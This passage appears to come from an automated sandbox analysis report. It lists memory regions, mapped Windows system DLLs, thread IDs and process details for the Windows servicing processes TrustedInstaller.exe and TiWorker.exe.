monitored = 0 entry_point = 0x7fffc9f33480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4747 start_va = 0x7fffc9f80000 end_va = 0x7fffca021fff monitored = 0 entry_point = 0x7fffc9faca60 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 4748 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4749 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4750 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4751 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4752 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4753 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 4754 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4755 start_va = 0x7fffca500000 end_va = 0x7fffca55ffff monitored = 0 entry_point = 0x7fffca510380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4756 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 4757 start_va = 0x7fffca600000 end_va = 0x7fffca75cfff monitored = 0 entry_point = 0x7fffca64efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4758 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 4759 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4760 start_va = 0x7fffcaa60000 end_va = 0x7fffcaa86fff monitored = 0 entry_point = 0x7fffcaa68690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4761 start_va = 0x7fffcad60000 end_va = 0x7fffcad7cfff monitored = 0 entry_point = 0x7fffcad623b0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 4762 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4763 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4764 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4765 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4766 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4767 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4768 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4769 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4770 start_va = 0x7fffcb970000 end_va = 0x7fffcb9c4fff monitored = 0 entry_point = 0x7fffcb97a7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4771 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4772 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4773 start_va = 0x7fffcbef0000 end_va = 0x7fffcc018fff monitored = 0 entry_point = 0x7fffcbf16140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4774 start_va = 0x7fffcc020000 end_va = 0x7fffcc08afff monitored = 0 entry_point = 0x7fffcc034300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4775 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4776 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4777 start_va = 0x7fffcc990000 end_va = 0x7fffcc9e5fff monitored = 0 entry_point = 0x7fffcc992840 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4778 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4779 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Thread: id = 386 os_tid = 0x1710 Thread: id = 387 os_tid = 0x1178 Thread: id = 388 os_tid = 0xb50 Thread: id = 389 os_tid = 0x132c Thread: id = 390 os_tid = 0x1328 Thread: id = 391 os_tid = 0xfd0 Thread: id = 392 os_tid = 0x1194 Thread: id = 393 os_tid = 0x116c Process: id = "21" image_name = "trustedinstaller.exe" filename = "c:\\windows\\servicing\\trustedinstaller.exe" page_root = "0x15443000" os_pid = "0x109c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x264" cmd_line = "C:\\Windows\\servicing\\TrustedInstaller.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\TrustedInstaller" [0xe], "NT AUTHORITY\\Logon Session 00000000:0013526c" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4807 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4808 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4809 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4810 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4811 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4812 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4813 start_va = 0xf0000 end_va = 0x1b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4814 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4815 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4816 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4817 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4818 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4819 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4820 start_va = 0x410000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4821 start_va = 0x420000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "trustedinstaller.exe.mui" filename = "\\Windows\\servicing\\en-US\\TrustedInstaller.exe.mui" (normalized: "c:\\windows\\servicing\\en-us\\trustedinstaller.exe.mui") Region: id = 4822 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 4823 start_va = 0x530000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4824 start_va = 0x5b0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4825 start_va = 0x630000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 4826 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4827 start_va = 0x710000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 4828 start_va = 0x910000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 4829 start_va = 0xaa0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 4830 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4831 start_va = 0xba0000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 4832 start_va = 0xc20000 end_va = 0xc20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 4833 start_va = 0xc30000 end_va = 0xcaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 4834 start_va = 0xcb0000 end_va = 0xcb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 4835 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4836 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 4837 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 4838 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 4839 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 4840 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4841 start_va = 0x7ff7ea240000 end_va = 0x7ff7ea267fff monitored = 0 entry_point = 0x7ff7ea2557b0 region_type = mapped_file name = "trustedinstaller.exe" filename = "\\Windows\\servicing\\TrustedInstaller.exe" (normalized: "c:\\windows\\servicing\\trustedinstaller.exe") Region: id = 4842 start_va = 0x7fffba530000 end_va = 0x7fffba55bfff monitored = 0 entry_point = 0x7fffba54b730 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\System32\\dbgcore.dll" (normalized: "c:\\windows\\system32\\dbgcore.dll") Region: id = 4843 start_va = 0x7fffba560000 end_va = 0x7fffba743fff monitored = 0 entry_point = 0x7fffba57a770 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 4844 start_va = 0x7fffc34e0000 end_va = 0x7fffc3522fff monitored = 0 entry_point = 0x7fffc34e1810 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\wdscore.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\wdscore.dll") Region: id = 4845 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4846 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4847 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 4848 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 0x7fffca4b73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4849 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 4850 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 4851 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4852 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4853 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4854 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4855 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4856 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4857 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4858 start_va = 0x7fffcbae0000 end_va = 0x7fffcbb87fff monitored = 0 entry_point = 0x7fffcbafd990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4859 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4860 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4861 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4862 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4863 start_va = 0x7fffc3460000 end_va = 0x7fffc3471fff monitored = 0 entry_point = 0x7fffc34616b0 region_type = mapped_file name = "cbsapi.dll" filename = "\\Windows\\servicing\\CbsApi.dll" (normalized: "c:\\windows\\servicing\\cbsapi.dll") Region: id = 4865 start_va = 0xcc0000 end_va = 0xcc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 4866 start_va = 0xcd0000 end_va = 0xcd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 4914 start_va = 0xce0000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 4947 start_va = 0xde0000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Thread: id = 398 os_tid = 0x16e0 Thread: id = 399 os_tid = 0x174c Thread: id = 400 os_tid = 0x91c Thread: id = 401 os_tid = 0x17cc Thread: id = 402 os_tid = 0x1334 Thread: id = 403 os_tid = 0x1718 Thread: id = 404 os_tid = 0x17a0 Thread: id = 405 os_tid = 0x9e0 Thread: id = 413 os_tid = 0xc64 Process: id = "22" image_name = "tiworker.exe" filename = "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\tiworker.exe" page_root = "0x29388000" os_pid = "0x59c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "21" os_parent_pid = "0x310" cmd_line = "C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\TiWorker.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\TrustedInstaller" [0xe], "NT AUTHORITY\\Logon Session 00000000:0013526c" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4867 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4868 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4869 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4870 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4871 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4872 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4873 start_va = 0xf0000 end_va = 0x1b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4874 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4875 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4876 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4877 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4878 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4879 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4880 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4881 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 4882 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 4883 start_va = 0x530000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 4884 start_va = 0x5b0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4885 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 4886 start_va = 0x6a0000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 4887 start_va = 0x720000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 4888 start_va = 0x7a0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 4889 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4890 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 4891 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 4892 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 4893 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 4894 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4895 start_va = 0x7ff7e3860000 end_va = 0x7ff7e389cfff monitored = 0 entry_point = 0x7ff7e3877ba0 region_type = mapped_file name = "tiworker.exe" filename = "\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\TiWorker.exe" (normalized: "c:\\windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\\tiworker.exe") Region: id = 4896 start_va = 0x7fffba530000 end_va = 0x7fffba55bfff monitored = 0 entry_point = 0x7fffba54b730 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\System32\\dbgcore.dll" (normalized: "c:\\windows\\system32\\dbgcore.dll") Region: id = 4897 start_va = 0x7fffba560000 end_va = 0x7fffba743fff monitored = 0 entry_point = 0x7fffba57a770 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 4898 start_va = 0x7fffc3460000 end_va = 0x7fffc3471fff monitored = 0 entry_point = 0x7fffc34616b0 region_type = mapped_file name = "cbsapi.dll" filename = "\\Windows\\servicing\\CbsApi.dll" (normalized: "c:\\windows\\servicing\\cbsapi.dll") Region: id = 4899 start_va = 0x7fffc34e0000 end_va = 0x7fffc3522fff monitored = 0 entry_point = 